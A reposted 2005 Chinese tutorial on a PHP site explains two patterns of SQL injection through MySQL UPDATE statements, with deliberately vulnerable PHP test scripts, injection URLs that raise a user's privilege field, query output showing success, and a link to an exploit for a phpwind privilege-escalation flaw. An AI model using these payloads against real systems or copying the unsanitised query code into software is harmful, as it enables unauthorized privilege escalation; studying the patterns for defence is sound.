Home >Backend Development >PHP Tutorial >UPDATE注射(mysql+php)的两个模式_PHP

UPDATE注射(mysql+php)的两个模式_PHP

WBOY
WBOYOriginal
2016-06-01 12:25:32943browse

本文作者:SuperHei
文章性质:原创
发布日期:2005-08-14

一、测试环境

OS: Windowsxp sp2
php: php 4.3.10
mysql 4.1.9
apache 1.3.33

二、测试数据库结构

-- 数据库: `test`
--

-- --------------------------------------------------------

--
-- 表的结构 `userinfo`
--

CREATE TABLE `userinfo` (
`groudid` varchar(12) NOT NULL default '1',
`user` varchar(12) NOT NULL default 'heige',
`pass` varchar(122) NOT NULL default '123456'
) TYPE=MyISAM;

--
-- 导出表中的数据 `userinfo`
--

INSERT INTO `userinfo` VALUES ('2', 'heige', '123456')

三、测试模式

1、变量没有带''或""

//test1.php Mod1
$servername = "localhost";
$dbusername = "root";
$dbpassword = "";
$dbname = "test";

mysql_connect($servername,$dbusername,$dbpassword) or die ("数据库连接失败");

$sql = "update userinfo set pass=$p where user='heige'";//

$result = mysql_db_query($dbname, $sql);
$userinfo = mysql_fetch_array($result);

echo "

SQL Query:$sql

";
?>

脚本里只是修改 user='heige' 的 pass,如果 groudid 表示用户的权限等级,我们的目的就是通过构造 $p 来达到修改 groupid 的目的,那么我们提交:

http://127.0.0.1/test1.php?p=123456,groudid=1

在mysql里查询:

mysql> select * from userinfo;
+---------+-------+--------+
| groudid | user | pass |
+---------+-------+--------+
| 1 | heige | 123456 |
+---------+-------+--------+
1 row in set (0.01 sec)

用户heige的groudid又2改为1了 :)

所以我们可以得到没有''或""update的注射是可以成功的,这个就是我们的模式1。

2、变量带''或""

//test2.php
$servername = "localhost";
$dbusername = "root";
$dbpassword = "";
$dbname = "test";

mysql_connect($servername,$dbusername,$dbpassword) or die ("数据库连接失败");

$sql = "update userinfo set pass='$p' where user='heige'";//

$result = mysql_db_query($dbname, $sql);
$userinfo = mysql_fetch_array($result);

echo "

SQL Query:$sql

";
?>

为了关闭'我们构造$p应该为 123456',groudid='2 提交:

http://127.0.0.1/test2.php?p=123456',groudid='1

在gpc=on的情况下'变成了\',提交的语句变成:

SQL Query:update userinfo set pass='123456\',groudid=\'1' where user='heige'

mysql查询:

mysql> select * from userinfo;
+---------+-------+--------------------+
| groudid | user | pass |
+---------+-------+--------------------+
| 2 | heige | 123456',groudid='1 |
+---------+-------+--------------------+
1 row in set (0.00 sec)

groudid并没有被修改。那么在变量被''或""时 就完全没有被注射呢?不是 下面我们看模式2:

//test3.php Mod2
$servername = "localhost";
$dbusername = "root";
$dbpassword = "";
$dbname = "test";

mysql_connect($servername,$dbusername,$dbpassword) or die ("数据库连接失败");

$sql = "update userinfo set pass='$p' where user='heige'";//

$result = mysql_db_query($dbname, $sql);
mysql_fetch_array($result); //$p的数据写入数据库

$sql= "select pass from userinfo where user='heige'";
$result = mysql_db_query($dbname, $sql);
$userinfo=mysql_fetch_array($result);

echo $userinfo[0]; //把pass查询输出给$userinfo[0]

$sql ="update userinfo set pass='$userinfo[0]' where user='heige'";
$result = mysql_db_query($dbname, $sql);
mysql_fetch_array($result); //把$userinfo[0] 再次update

?>

我们测试下,提交:

http://127.0.0.1/test3.php?p=123456',groudid='1

回mysql查询下 :

mysql> select * from userinfo;
+---------+-------+--------+
| groudid | user | pass |
+---------+-------+--------+
| 1 | heige | 123456 |
+---------+-------+--------+
1 row in set (0.00 sec)

HaHa~~ 成功注射 修改groudid为1。 这个就是我们的模式2了,简单的描叙如下:

update --> select --> update

四、实际模式

模式1:缺

模式2:phpwind 2.0.2和3.31e 权限提升漏洞

漏洞分析

update (profile.php 注射变量为$proicon update语句里为,icon='$userdb[icon]')

select (jop.php)

updtate (jop.php)

Exploit: http://www.huij.net/9xiao/up/phpwind-exploit.exe

五、鸣谢

特别感谢saiy等朋友的讨论和帮助。Thanks!!

Statement:
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn